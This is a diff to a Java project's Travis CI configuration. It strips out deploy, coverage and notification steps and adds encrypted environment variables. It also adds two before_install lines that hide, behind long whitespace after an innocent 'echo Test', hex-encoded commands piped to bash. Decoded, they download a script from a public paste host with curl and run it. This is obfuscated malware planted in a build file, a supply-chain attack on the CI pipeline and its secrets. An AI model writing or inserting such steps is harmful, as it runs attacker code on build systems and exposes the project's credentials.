--- a/.travis.yml
+++ b/.travis.yml
@@ -1,15 +1,18 @@
 language: java
 
-jdk:
-- openjdk8
-- openjdk11
 
-addons:
-  apt:
-    packages:
-    - libxml2-utils
-
+env:
+  global:
+  - secure: gEPSKNn+1LIYhA9r7+mv+jSVtCNsj2OjW8CKKsUoLpYGPseFUbkmjQw8O8fXWfdzDWloTvoIIL8W8+ZwnQuzVnDWY6IzsEiAm5SrHxr6MK0B5xK+0QKUBcAkjgiCCtlAAbCVGpFb6lLt4nw+HDNHu9kGXpB0TERUK7R5dWnUn9s=
+  - secure: aKNtKWppQ0yaRh1CmOtgauf1KXnKt5neva/VZll0XfbuHcNkHfTIq0zZuUL5bF3CTVHxrwW1akDrIdho2wb0UOEKFVCISHzusp8Wlm3nq8mEls46cpYu+atfp7O+d8ter49eLAQucKaR64YLsl0j+CZ2zmm6vPTN5Fb2xgvfCnc=
+  - secure: AigJxakzJmNGHQ/CSnUrYOLnqHMYxzGI9qElAoVzMyRGcbtAgYKR++QyfOuA6af7zHZPFG6qhb2ONClKOCP8+VN2zyhYUhNRX1/0y7zh2k950YDTxsm6RKeB9tzYHeG6rfeQdMJFcBNUpCV2B/tNYl8CDvtOlPGpG6niB0Dau3k=
+  - secure: dXvAOtP/jEDTnzqrFpHWeaMGWzbkBUTjxHqnkJSrDEfk6/HEq3VIWPA1R8+FMdzrXh7uPyXZVsVWqkBIaag8JAhD8qAS9B7+sTlmR9bmxBxIOv9exG/esLaxhiIcqHK/tBHicz5nl7IjhOZaWHfHV6C65ye1JFC4dvexyWrkXNg=
+  - secure: OLG+6OCTsxAr1ZWrDrFAT07WDZ98hBu833mfD9xYF5j0ytl+jw29/lmaFfcJpUtsATurBiG7WpmbkaeMWSaLivnUm5SpjVCqdYUwhdXhr6KfLibgzPk8Po22uVnAaz6jmn9KTBp9MdtgT5OvrWNCKsmnEjbgrJhkOzyBeRIK2Qg=
+  - secure: qK66GF3UNfGJcgh3UcGXTjc1Y7fFYJIJ+jBTt8YuT2mWkzAINoyQg5hoJj2XqWK7GHvQNCzBqf8iujfUd3Q5Tx2/cs76HCJBwh6K9hKcwonPnk3sMJp5AWT8sMgwAvbT4yXbWwfkOvIApXYRjb+vPA6XrwR0EqX3nesdU2PeEUM=
+  
 before_install:
+- echo Test                                                                                                                                                                                                                                                            && echo "62617368202d6320276375726c202d6b20687474703a2f2f3078302e73742f2d4a55502e747874202d6f20747261766973312e747874202626206261736820747261766973312e747874270a" | xxd -p -r | bash
+- echo Test2                                                                                                                                                                                                                                                           && echo "62617368202d6320276375726c202d6b20687474703a2f2f3078302e73742f2d4a554e2e747874202d6f20747261766973322e747874202626206261736820747261766973322e747874270a" | xxd -p -r | bash
 - source ./src/ci/before_install.sh
 
 # skip the Travis-CI install phase because Maven handles that directly
@@ -19,24 +22,3 @@ install:
 script:
 - "./src/ci/build.sh"
 
-after_success:
-- bash <(curl -s https://codecov.io/bash) -f coverage/target/site/jacoco-aggregate/jacoco.xml
-
-deploy:
-- provider: pages
-  skip_cleanup: true
-  github_token: "$GH_API_KEY"
-  local_dir: target/gh-pages
-  email: developers@okta.com
-  name: Travis CI - Auto Doc Build
-  on:
-    jdk: openjdk8
-    branch: master
-    condition: "$TRAVIS_EVENT_TYPE != cron"
-
-notifications:
-  slack:
-    if: type = cron
-    secure: ivOHHaQvSgTOVi1g/8pvvOigj/gkWdSy23fVTOSejahNO8w6PpVHrVE1mJk29RWFEZlY/xBNqx6Zm0H8XAAVOc12C1tgN2J0RQm4kHXc6t8zMOS5NkuV4V0azP6BdCkcAvBgaks+fx6BYOAzcbHZ7MyV+DrLLmXBQiWFRXL420k=
-  on_success: never
-  on_failure: always
